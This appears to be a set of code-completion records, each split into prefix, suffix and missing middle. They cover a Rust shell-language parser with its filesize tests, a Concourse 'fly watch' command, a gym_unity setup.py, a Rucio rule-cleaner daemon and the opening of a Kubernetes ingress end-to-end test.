                }
            } else {
                // Unknown flag: record garbage so positional counting stays stable.
                positional.push(garbage(lite_cmd.parts[idx].span));

                if error.is_none() {
                    error = err;
                }
            }
        } else if signature.positional.len() > current_positional {
            let arg = {
                let (new_idx, expr, err) = parse_positional_argument(
                    idx,
                    lite_cmd,
                    &signature.positional[current_positional].0,
                    signature.positional.len() - current_positional - 1,
                    scope,
                );
                idx = new_idx;
                if error.is_none() {
                    error = err;
                }
                expr
            };

            positional.push(arg);
            current_positional += 1;
        } else if let Some((_, rest_type, _)) = &signature.rest_positional {
            // Declared positionals are exhausted; overflow into rest args.
            let (arg, err) = parse_arg(*rest_type, scope, &lite_cmd.parts[idx]);
            if error.is_none() {
                error = err;
            }

            positional.push(arg);
            current_positional += 1;
        } else {
            positional.push(garbage(lite_cmd.parts[idx].span));

            if error.is_none() {
                error = Some(ParseError::argument_error(
                    lite_cmd.parts[0].clone(),
                    ArgumentError::UnexpectedArgument(lite_cmd.parts[idx].clone()),
                ));
            }
        }

        idx += 1;
    }

    // Count the required positional arguments and ensure these have been met
    let mut required_arg_count = 0;
    for positional_arg in &signature.positional {
        if let PositionalType::Mandatory(_, _) = positional_arg.0 {
            required_arg_count += 1;
        }
    }
    if positional.len() < required_arg_count && error.is_none() {
        // to make "command -h" work even if required arguments are missing
        if !named.named.contains_key("help") {
            let (_, name) = &signature.positional[positional.len()];
            error = Some(ParseError::argument_error(
                lite_cmd.parts[0].clone(),
                ArgumentError::MissingMandatoryPositional(name.to_owned()),
            ));
        }
    }

    if !named.is_empty() {
        internal_command.args.named = Some(named);
    }

    if !positional.is_empty() {
        internal_command.args.positional = Some(positional);
    }

    (internal_command, error)
}
/// Classify an external (non-builtin) command invocation as a synthetic
/// `run_external` internal call, with the command name as the first
/// positional argument.
fn parse_external_call(
    lite_cmd: &LiteCommand,
    end_of_pipeline: bool,
    scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
    // Expand quotes and `~`/env paths in the command name before parsing it.
    let raw_name = lite_cmd.parts[0].clone().map(|v| {
        let trimmed = trim_quotes(&v);
        expand_path(trimmed).to_string_lossy().to_string()
    });

    let (head, head_err) = parse_arg(SyntaxShape::String, scope, &raw_name);
    let name_span = head.span;
    let mut first_error = head_err;

    // The command name becomes positional[0] of `run_external`.
    let mut args = vec![head];
    for lite_arg in &lite_cmd.parts[1..] {
        let (expr, err) = parse_external_arg(lite_arg, scope);
        if first_error.is_none() {
            first_error = err;
        }
        args.push(expr);
    }

    // Only redirect stdout when something downstream will consume it.
    let redirection = if end_of_pipeline {
        ExternalRedirection::None
    } else {
        ExternalRedirection::Stdout
    };

    (
        Some(ClassifiedCommand::Internal(InternalCommand {
            name: "run_external".to_string(),
            name_span,
            args: hir::Call {
                head: Box::new(SpannedExpression {
                    expr: Expression::string("run_external".to_string()),
                    span: name_span,
                }),
                positional: Some(args),
                named: None,
                span: name_span,
                external_redirection: redirection,
            },
        })),
        first_error,
    )
}
/// Classify an invocation whose head is a block value (e.g. `{|x| ...} 1 2`)
/// as a dynamic call.
fn parse_value_call(
    call: LiteCommand,
    scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
    let (head, head_err) = parse_arg(SyntaxShape::Block, scope, &call.parts[0]);
    let mut first_error = head_err;
    // The call's span grows to cover every parsed argument.
    let mut full_span = head.span;

    let mut positional = vec![];
    for part in call.parts.iter().skip(1) {
        let (expr, err) = parse_arg(SyntaxShape::Any, scope, part);
        if first_error.is_none() {
            first_error = err;
        }
        full_span = full_span.until(expr.span);
        positional.push(expr);
    }

    (
        Some(ClassifiedCommand::Dynamic(hir::Call {
            head: Box::new(head),
            positional: Some(positional),
            named: None,
            span: full_span,
            external_redirection: ExternalRedirection::None,
        })),
        first_error,
    )
}
/// If the first word of `call` names an alias, splice the alias expansion in
/// front of the remaining arguments, pointing every expanded token's span at
/// the alias usage site for error reporting.
fn expand_aliases_in_call(call: &mut LiteCommand, scope: &dyn ParserScope) {
    let (alias_span, expansion) = match call.parts.first() {
        Some(name) => match scope.get_alias(name) {
            Some(expansion) => (name.span, expansion),
            None => return,
        },
        None => return,
    };

    // Re-span the expanded tokens to the alias itself.
    let mut new_parts: Vec<_> = expansion
        .into_iter()
        .map(|mut item| {
            item.span = alias_span;
            item
        })
        .collect();

    // Replace the alias word with its expansion, keeping the original args.
    new_parts.extend(call.parts.drain(1..));
    call.parts = new_parts;
}
/// Classify a single lite command: expand aliases, then dispatch on the
/// first word to one of — an explicit external (`^cmd`), a value call
/// (`{...} args`), a bare math expression, a known internal command
/// (including multi-word subcommands), or a fallback external call.
fn parse_call(
    mut lite_cmd: LiteCommand,
    end_of_pipeline: bool,
    scope: &dyn ParserScope,
) -> (Option<ClassifiedCommand>, Option<ParseError>) {
    expand_aliases_in_call(&mut lite_cmd, scope);

    let mut error = None;
    if lite_cmd.parts.is_empty() {
        return (None, None);
    } else if lite_cmd.parts[0].item.starts_with('^') {
        // `^name` forces an external call; strip the caret from item and span.
        let mut name = lite_cmd.parts[0]
            .clone()
            .map(|v| v.chars().skip(1).collect::<String>());
        name.span = Span::new(name.span.start() + 1, name.span.end());

        // TODO this is the same as the `else` branch below, only the name differs. Find a way
        // to share this functionality.
        let mut args = vec![];

        let (name, err) = parse_arg(SyntaxShape::String, scope, &name);
        let name_span = name.span;
        if error.is_none() {
            error = err;
        }
        args.push(name);

        for lite_arg in &lite_cmd.parts[1..] {
            let (expr, err) = parse_external_arg(lite_arg, scope);
            if error.is_none() {
                error = err;
            }
            args.push(expr);
        }

        return (
            Some(ClassifiedCommand::Internal(InternalCommand {
                name: "run_external".to_string(),
                name_span,
                args: hir::Call {
                    head: Box::new(SpannedExpression {
                        expr: Expression::string("run_external".to_string()),
                        span: name_span,
                    }),
                    positional: Some(args),
                    named: None,
                    span: name_span,
                    external_redirection: if end_of_pipeline {
                        ExternalRedirection::None
                    } else {
                        ExternalRedirection::Stdout
                    },
                },
            })),
            error,
        );
    } else if lite_cmd.parts[0].item.starts_with('{') {
        return parse_value_call(lite_cmd, scope);
    } else if lite_cmd.parts[0].item.starts_with('$')
        || lite_cmd.parts[0].item.starts_with('\"')
        || lite_cmd.parts[0].item.starts_with('\'')
        // A leading '-' only counts as an expression when it parses as a
        // number or a range (otherwise it's likely an external's flag).
        || (lite_cmd.parts[0].item.starts_with('-')
            && parse_arg(SyntaxShape::Number, scope, &lite_cmd.parts[0])
                .1
                .is_none())
        || (lite_cmd.parts[0].item.starts_with('-')
            && parse_arg(SyntaxShape::Range, scope, &lite_cmd.parts[0])
                .1
                .is_none())
        // Any leading ASCII digit means a literal (number, filesize, date, ...).
        || lite_cmd.parts[0].item.starts_with(|c: char| c.is_ascii_digit())
        || lite_cmd.parts[0].item.starts_with('[')
        || lite_cmd.parts[0].item.starts_with('(')
    {
        // The line is a bare expression/pipeline value, not a command.
        let (_, expr, err) = parse_math_expression(0, &lite_cmd.parts[..], scope, false);
        error = error.or(err);
        return (Some(ClassifiedCommand::Expr(Box::new(expr))), error);
    } else if lite_cmd.parts.len() > 1 {
        // FIXME: only build up valid subcommands instead of all arguments
        // by checking each part to see if it's a valid identifier name

        // Greedily try the longest multi-word name first ("git status" before "git").
        let mut parts: Vec<_> = lite_cmd.parts.clone().into_iter().map(|x| x.item).collect();
        while parts.len() > 1 {
            // Check if it's a sub-command
            if let Some(signature) = scope.get_signature(&parts.join(" ")) {
                let (mut internal_command, err) =
                    parse_internal_command(&lite_cmd, scope, &signature, parts.len() - 1);

                error = error.or(err);
                internal_command.args.external_redirection = if end_of_pipeline {
                    ExternalRedirection::None
                } else {
                    ExternalRedirection::Stdout
                };
                return (Some(ClassifiedCommand::Internal(internal_command)), error);
            }
            parts.pop();
        }
    }

    // Check if it's an internal command
    if let Some(signature) = scope.get_signature(&lite_cmd.parts[0].item) {
        // `def`, `source`, and `alias`/`unalias` need extra side-effectful
        // handling (registering definitions/aliases in scope).
        if lite_cmd.parts[0].item == "def" {
            let err = parse_definition(&lite_cmd, scope);
            error = error.or(err);
        }
        let (mut internal_command, err) = parse_internal_command(&lite_cmd, scope, &signature, 0);

        if internal_command.name == "source" {
            let err = parse_source_internal(&lite_cmd, &internal_command, scope).err();

            return (Some(ClassifiedCommand::Internal(internal_command)), err);
        } else if lite_cmd.parts[0].item == "alias" || lite_cmd.parts[0].item == "unalias" {
            let error = parse_alias(&lite_cmd, scope);
            if error.is_none() {
                return (Some(ClassifiedCommand::Internal(internal_command)), None);
            } else {
                return (Some(ClassifiedCommand::Internal(internal_command)), error);
            }
        }

        error = error.or(err);
        internal_command.args.external_redirection = if end_of_pipeline {
            ExternalRedirection::None
        } else {
            ExternalRedirection::Stdout
        };
        (Some(ClassifiedCommand::Internal(internal_command)), error)
    } else {
        parse_external_call(&lite_cmd, end_of_pipeline, scope)
    }
}
/// Convert a lite-ly parsed pipeline into a fully classified pipeline, ready to be evaluated.
/// This conversion does error-recovery, so the result is allowed to be lossy. A lossy unit is designated as garbage.
/// Errors are returned as part of a side-car error rather than a Result to allow both error and lossy result simultaneously.
fn parse_pipeline(
    lite_pipeline: LitePipeline,
    scope: &dyn ParserScope,
) -> (Pipeline, Option<ParseError>) {
    let mut commands = Pipeline::new(lite_pipeline.span());
    let mut error = None;
    let pipeline_len = lite_pipeline.commands.len();
    for (idx, lite_cmd) in lite_pipeline.commands.into_iter().enumerate() {
        // Only the final command of the pipeline is at "end of pipeline";
        // parse_call uses that to decide external output redirection.
        let (call, err) = parse_call(lite_cmd, idx == pipeline_len - 1, scope);
        // Keep only the first error encountered; later ones are usually cascades.
        if error.is_none() {
            error = err;
        }
        if let Some(call) = call {
            // A command after the first that reads `$in` needs the upstream
            // value collected first, so wrap it in a synthetic `collect` call.
            let call = if idx > 0 && call.has_var_usage("$in") {
                wrap_with_collect(call, "$in")
            } else {
                call
            };
            commands.push(call);
        }
    }
    (commands, error)
}
/// A `NAME=value` shorthand pair peeled off the front of a pipeline, with spans.
type SpannedKeyValue = (Spanned<String>, Spanned<String>);
/// Wrap `call` in a synthetic `collect { |var_name| ... }` invocation so the
/// upstream pipeline value is fully gathered before the wrapped command runs.
fn wrap_with_collect(call: ClassifiedCommand, var_name: &str) -> ClassifiedCommand {
    // Body block: a single group holding a single pipeline with the wrapped call.
    let inner_pipeline = Pipeline {
        list: vec![call],
        span: Span::unknown(),
    };
    let mut body = Block::basic();
    body.block.push(Group {
        pipelines: vec![inner_pipeline],
        span: Span::unknown(),
    });
    // The block takes one mandatory parameter: the implied collection variable.
    body.params.positional = vec![(
        PositionalType::Mandatory(var_name.into(), SyntaxShape::Any),
        format!("implied {}", var_name),
    )];
    let head = SpannedExpression {
        expr: Expression::Synthetic(Synthetic::String("collect".into())),
        span: Span::unknown(),
    };
    let block_arg = SpannedExpression {
        expr: Expression::Block(Arc::new(body)),
        span: Span::unknown(),
    };
    ClassifiedCommand::Internal(InternalCommand {
        name: "collect".into(),
        name_span: Span::unknown(),
        args: Call {
            head: Box::new(head),
            positional: Some(vec![block_arg]),
            named: None,
            span: Span::unknown(),
            external_redirection: ExternalRedirection::Stdout,
        },
    })
}
/// Expand a leading `NAME=value` environment shorthand on the first command
/// of the pipeline.
///
/// Returns the (possibly rewritten) pipeline, the extracted `(name, value)`
/// pair if a shorthand was found, and any parse error. A shorthand with no
/// command following it is an error.
fn expand_shorthand_forms(
    lite_pipeline: &LitePipeline,
) -> (LitePipeline, Option<SpannedKeyValue>, Option<ParseError>) {
    // Nothing to expand in an empty pipeline.
    if lite_pipeline.commands.is_empty() {
        return (lite_pipeline.clone(), None, None);
    }
    let first_part = &lite_pipeline.commands[0].parts[0];
    // `$x = ...` is a variable expression, not an env shorthand.
    if !first_part.contains('=') || first_part.starts_with('$') {
        return (lite_pipeline.clone(), None, None);
    }
    let assignment: Vec<_> = first_part.splitn(2, '=').collect();
    if assignment.len() != 2 {
        return (
            lite_pipeline.clone(),
            None,
            Some(ParseError::mismatch(
                "environment variable assignment",
                first_part.clone(),
            )),
        );
    }
    let original_span = first_part.span;
    let env_value = trim_quotes(assignment[1]);
    let (variable_name, value) = (assignment[0], env_value);
    let mut lite_pipeline = lite_pipeline.clone();
    // BUGFIX: this condition previously read `!...parts.len() > 1`, which
    // bitwise-negates the usize length before comparing (`(!len) > 1`) and is
    // true for every realistic length — making the "a command following
    // variable" error below unreachable and leaving an empty command behind.
    if lite_pipeline.commands[0].parts.len() > 1 {
        // Drop the `NAME=value` token; the remainder is the real command.
        let mut new_lite_command_parts = lite_pipeline.commands[0].parts.clone();
        new_lite_command_parts.remove(0);
        lite_pipeline.commands[0].parts = new_lite_command_parts;
        (
            lite_pipeline,
            Some((
                variable_name.to_string().spanned(original_span),
                value.spanned(original_span),
            )),
            None,
        )
    } else {
        (
            lite_pipeline.clone(),
            None,
            Some(ParseError::mismatch(
                "a command following variable",
                lite_pipeline.commands[0].parts[0].clone(),
            )),
        )
    }
}
/// Validate an `alias`/`unalias` invocation and register the result in scope.
///
/// Returns a `ParseError` when the command is malformed; `None` on success.
/// The bare `alias`, `alias --help`, and `alias -h` forms are accepted here
/// and left for the command itself to handle.
fn parse_alias(call: &LiteCommand, scope: &dyn ParserScope) -> Option<ParseError> {
    if call.parts[0].item == "alias" {
        if (call.parts.len() == 1)
            || (call.parts.len() == 2
                && (call.parts[1].item == "--help" || (call.parts[1].item == "-h")))
        {
            return None;
        }
        // Minimum well-formed alias: `alias <name> = <body...>`.
        if call.parts.len() < 4 {
            return Some(ParseError::mismatch("alias", call.parts[0].clone()));
        }
        // (Removed a dead re-check of `parts[0].item != "alias"` here — this
        // branch is only reachable when it already equals "alias".)
        if call.parts[2].item != "=" {
            return Some(ParseError::mismatch("=", call.parts[2].clone()));
        }
    } else {
        // unalias takes exactly one argument: the alias name.
        if call.parts.len() != 2 {
            return Some(ParseError::mismatch("unalias", call.parts[0].clone()));
        }
    }
    let name = call.parts[1].item.clone();
    // Everything after `alias <name> =` is the alias body (empty for unalias).
    let args: Vec<_> = call.parts.iter().skip(3).cloned().collect();
    match call.parts[0].item.as_str() {
        "alias" => scope.add_alias(&name, args),
        "unalias" => {
            scope.remove_alias(&name);
        }
        _ => unreachable!(),
    };
    None
}
/// Convert a `LiteBlock` into a fully classified `Block`.
///
/// Two passes: the first registers prototypes for every `def` custom command
/// (so pipelines may call commands defined later in the block); the second
/// classifies each pipeline, peeling `NAME=value` shorthands off the front
/// and re-wrapping the pipeline in nested `with-env` invocations.
///
/// Only the first error encountered is kept in the side-car `Option`.
pub fn classify_block(
    lite_block: &LiteBlock,
    scope: &dyn ParserScope,
) -> (Arc<Block>, Option<ParseError>) {
    let mut output = Block::basic();
    let mut error = None;
    // Check for custom commands first
    for group in lite_block.block.iter() {
        for pipeline in &group.pipelines {
            for call in &pipeline.commands {
                if let Some(first) = call.parts.first() {
                    if first.item == "def" {
                        // A definition must be the only command in its pipeline.
                        if pipeline.commands.len() > 1 && error.is_none() {
                            error = Some(ParseError::mismatch("definition", first.clone()));
                        }
                        parse_definition_prototype(call, scope);
                    }
                }
            }
        }
    }
    // Then the rest of the code
    for group in &lite_block.block {
        let mut out_group = Group::basic();
        for pipeline in &group.pipelines {
            let mut env_vars = vec![];
            let mut pipeline = pipeline.clone();
            // Peel off every leading `NAME=value` shorthand, collecting the
            // pairs; stops at the first non-shorthand token (or on error).
            loop {
                if pipeline.commands.is_empty() || pipeline.commands[0].parts.is_empty() {
                    break;
                }
                let (pl, vars, err) = expand_shorthand_forms(&pipeline);
                if error.is_none() {
                    error = err;
                }
                pipeline = pl;
                if let Some(vars) = vars {
                    env_vars.push(vars);
                } else {
                    break;
                }
            }
            let pipeline_span = pipeline.span();
            let (mut out_pipe, err) = parse_pipeline(pipeline, scope);
            if error.is_none() {
                error = err;
            }
            // Re-wrap the classified pipeline in one `with-env` layer per
            // collected pair, innermost layer corresponding to the last pair.
            while let Some(vars) = env_vars.pop() {
                let span = pipeline_span;
                // The current pipeline becomes the body block of `with-env`.
                let block = hir::Block::new(
                    Signature::new("<block>"),
                    vec![Group::new(vec![out_pipe.clone()], span)],
                    IndexMap::new(),
                    span,
                );
                let mut call = hir::Call::new(
                    Box::new(SpannedExpression {
                        expr: Expression::string("with-env".to_string()),
                        span,
                    }),
                    span,
                );
                // Positional args: `[name value]` list, then the body block.
                call.positional = Some(vec![
                    SpannedExpression {
                        expr: Expression::List(vec![
                            SpannedExpression {
                                expr: Expression::string(vars.0.item),
                                span: vars.0.span,
                            },
                            SpannedExpression {
                                expr: Expression::string(vars.1.item),
                                span: vars.1.span,
                            },
                        ]),
                        span: Span::new(vars.0.span.start(), vars.1.span.end()),
                    },
                    SpannedExpression {
                        expr: Expression::Block(Arc::new(block)),
                        span,
                    },
                ]);
                let classified_with_env = ClassifiedCommand::Internal(InternalCommand {
                    name: "with-env".to_string(),
                    name_span: Span::unknown(),
                    args: call,
                });
                out_pipe = Pipeline {
                    list: vec![classified_with_env],
                    span,
                };
            }
            if !out_pipe.list.is_empty() {
                out_group.push(out_pipe);
            }
        }
        if !out_group.pipelines.is_empty() {
            output.push(out_group);
        }
    }
    // Attach definitions gathered in scope, without overwriting earlier ones.
    let definitions = scope.get_definitions();
    for definition in definitions.into_iter() {
        let name = definition.params.name.clone();
        if !output.definitions.contains_key(&name) {
            output.definitions.insert(name, definition.clone());
        }
    }
    output.infer_params();
    (Arc::new(output), error)
}
/// Parse `input` (with spans offset by `span_offset`) into a classified
/// block, reporting the first error from any stage of the pipeline:
/// lexing, lite-block parsing, then classification.
pub fn parse(
    input: &str,
    span_offset: usize,
    scope: &dyn ParserScope,
) -> (Arc<Block>, Option<ParseError>) {
    let (tokens, lex_err) = lex(input, span_offset, NewlineMode::Normal);
    let (lite_block, lite_err) = parse_block(tokens);
    let (block, classify_err) = classify_block(&lite_block, scope);
    // Earliest error wins, matching the stage order above.
    (block, lex_err.or(lite_err).or(classify_err))
}
#[test]
fn unit_parse_byte_units() {
    // (input literal, expected numeric value, expected unit)
    let cases: &[(&str, i64, Unit)] = &[
        ("108b", 108, Unit::Byte),
        ("0B", 0, Unit::Byte),
        ("10kb", 10, Unit::Kilobyte),
        ("16KB", 16, Unit::Kilobyte),
        ("99kB", 99, Unit::Kilobyte),
        ("27Kb", 27, Unit::Kilobyte),
        ("11Mb", 11, Unit::Megabyte),
        ("27mB", 27, Unit::Megabyte),
        ("811Gb", 811, Unit::Gigabyte),
        ("27gB", 27, Unit::Gigabyte),
        ("11Tb", 11, Unit::Terabyte),
        ("1027tB", 1027, Unit::Terabyte),
        ("11Pb", 11, Unit::Petabyte),
        ("27pB", 27, Unit::Petabyte),
        ("10kib", 10, Unit::Kibibyte),
        ("123KiB", 123, Unit::Kibibyte),
        ("24kiB", 24, Unit::Kibibyte),
        ("10mib", 10, Unit::Mebibyte),
        ("123MiB", 123, Unit::Mebibyte),
        ("10gib", 10, Unit::Gibibyte),
        ("123GiB", 123, Unit::Gibibyte),
        ("10tib", 10, Unit::Tebibyte),
        ("123TiB", 123, Unit::Tebibyte),
        ("10pib", 10, Unit::Pebibyte),
        ("123PiB", 123, Unit::Pebibyte),
    ];
    for (string, value, unit) in cases.iter() {
        let input_len = string.len();
        let value_len = value.to_string().len();
        let input = string.to_string().spanned(Span::new(0, input_len));
        let result = parse_filesize(&input);
        // No parse error, and the expression splits into value + unit spans.
        assert_eq!(result.1, None);
        assert_eq!(
            result.0.expr,
            Expression::unit(
                Spanned {
                    span: Span::new(0, value_len),
                    item: *value
                },
                Spanned {
                    span: Span::new(value_len, input_len),
                    item: unit.clone()
                }
            )
        );
    }
}
#[test]
fn unit_parse_byte_units_decimal() {
    // (input literal, expected value after scaling down one unit,
    //  textual value part, expected (downscaled) unit)
    let cases: &[(&str, i64, &str, Unit)] = &[
        ("0.25KB", 250, "0.25", Unit::Byte),
        ("2.5Mb", 2500, "2.5", Unit::Kilobyte),
        ("0.5Gb", 500, "0.5", Unit::Megabyte),
        ("811.5Gb", 811500, "811.5", Unit::Megabyte),
        ("11.5Tb", 11500, "11.5", Unit::Gigabyte),
        ("12.5Pb", 12500, "12.5", Unit::Terabyte),
        ("10.5kib", 10752, "10.5", Unit::Byte),
        ("0.5mib", 512, "0.5", Unit::Kibibyte),
        ("3.25gib", 3328, "3.25", Unit::Mebibyte),
    ];
    for (string, value, value_str, unit) in cases.iter() {
        let input_len = string.len();
        let value_len = value_str.len();
        let input = string.to_string().spanned(Span::new(0, input_len));
        let result = parse_filesize(&input);
        // No parse error, and the spans cover the numeric text and the suffix.
        assert_eq!(result.1, None);
        assert_eq!(
            result.0.expr,
            Expression::unit(
                Spanned {
                    span: Span::new(0, value_len),
                    item: *value
                },
                Spanned {
                    span: Span::new(value_len, input_len),
                    item: unit.clone()
                }
            )
        );
    }
}
| format |
watch.go | package commands
import (
"fmt"
"os"
"strconv"
"github.com/concourse/fly/commands/internal/flaghelpers"
"github.com/concourse/fly/eventstream"
"github.com/concourse/fly/rc"
)
type WatchCommand struct {
Job flaghelpers.JobFlag `short:"j" long:"job" value-name:"PIPELINE/JOB" description:"Watches builds of the given job"`
Build string `short:"b" long:"build" description:"Watches a specific build"`
}
func (command *WatchCommand) Execute(args []string) error {
target, err := rc.LoadTarget(Fly.Target, Fly.Verbose)
if err != nil {
return err
}
err = target.Validate()
if err != nil {
return err
}
var buildId int
client := target.Client()
if command.Job.JobName != "" || command.Build == "" {
build, err := GetBuild(client, target.Team(), command.Job.JobName, command.Build, command.Job.PipelineName)
if err != nil {
return err
}
buildId = build.ID
} else if command.Build != "" {
buildId, err = strconv.Atoi(command.Build)
if err != nil {
return err
}
}
eventSource, err := client.BuildEvents(fmt.Sprintf("%d", buildId))
if err != nil |
exitCode := eventstream.Render(os.Stdout, eventSource)
eventSource.Close()
os.Exit(exitCode)
return nil
}
| {
return err
} |
setup.py | #!/usr/bin/env python
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.install import install
VERSION = "0.11.0"
class | (install):
"""
Custom command to verify that the git tag matches our version
See https://circleci.com/blog/continuously-deploying-python-packages-to-pypi-with-circleci/
"""
description = "verify that the git tag matches our version"
def run(self):
tag = os.getenv("CIRCLE_TAG")
if tag != VERSION:
info = "Git tag: {0} does not match the version of this app: {1}".format(
tag, VERSION
)
sys.exit(info)
setup(
name="gym_unity",
version=VERSION,
description="Unity Machine Learning Agents Gym Interface",
license="Apache License 2.0",
author="Unity Technologies",
author_email="[email protected]",
url="https://github.com/Unity-Technologies/ml-agents",
packages=find_packages(),
install_requires=["gym", "mlagents_envs=={}".format(VERSION)],
cmdclass={"verify": VerifyVersionCommand},
)
| VerifyVersionCommand |
cleaner.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <[email protected]>, 2013-2016
# - Mario Lassnig <[email protected]>, 2013-2015
# - Cedric Serfon <[email protected]>, 2013
# - Vincent Garonne <[email protected]>, 2014-2018
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception, e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
def | (signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Clean threads.
"""
client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-cleaner', hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in xrange(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
| stop |
vanilla_ingress_test.go | package ingress
import (
"context"
"fmt"
awssdk "github.com/aws/aws-sdk-go/aws"
"github.com/gavv/httpexpect/v2"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
corev1 "k8s.io/api/core/v1"
networking "k8s.io/api/networking/v1beta1"
apierrs "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"net/http"
"sigs.k8s.io/aws-load-balancer-controller/pkg/k8s"
"sigs.k8s.io/aws-load-balancer-controller/test/framework"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/fixture"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/manifest"
"sigs.k8s.io/aws-load-balancer-controller/test/framework/utils"
"time"
)
var _ = Describe("vanilla ingress tests", func() {
var (
ctx context.Context
// sandbox namespace
sandboxNS *corev1.Namespace
)
BeforeEach(func() {
ctx = context.Background()
if tf.Options.ControllerImage != "" {
By(fmt.Sprintf("ensure cluster installed with controller: %s", tf.Options.ControllerImage), func() {
tf.CTRLInstallationManager.UpgradeController(tf.Options.ControllerImage)
time.Sleep(60 * time.Second)
})
}
By("setup sandbox namespace", func() {
tf.Logger.Info("allocating namespace")
ns, err := tf.NSManager.AllocateNamespace(ctx, "aws-lb-e2e")
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("allocated namespace", "name", ns.Name)
sandboxNS = ns
})
})
AfterEach(func() {
if sandboxNS != nil {
By("teardown sandbox namespace", func() {
{
tf.Logger.Info("deleting namespace", "name", sandboxNS.Name)
err := tf.K8sClient.Delete(ctx, sandboxNS)
Expect(err).Should(SatisfyAny(BeNil(), Satisfy(apierrs.IsNotFound)))
tf.Logger.Info("deleted namespace", "name", sandboxNS.Name)
}
{
tf.Logger.Info("waiting namespace becomes deleted", "name", sandboxNS.Name)
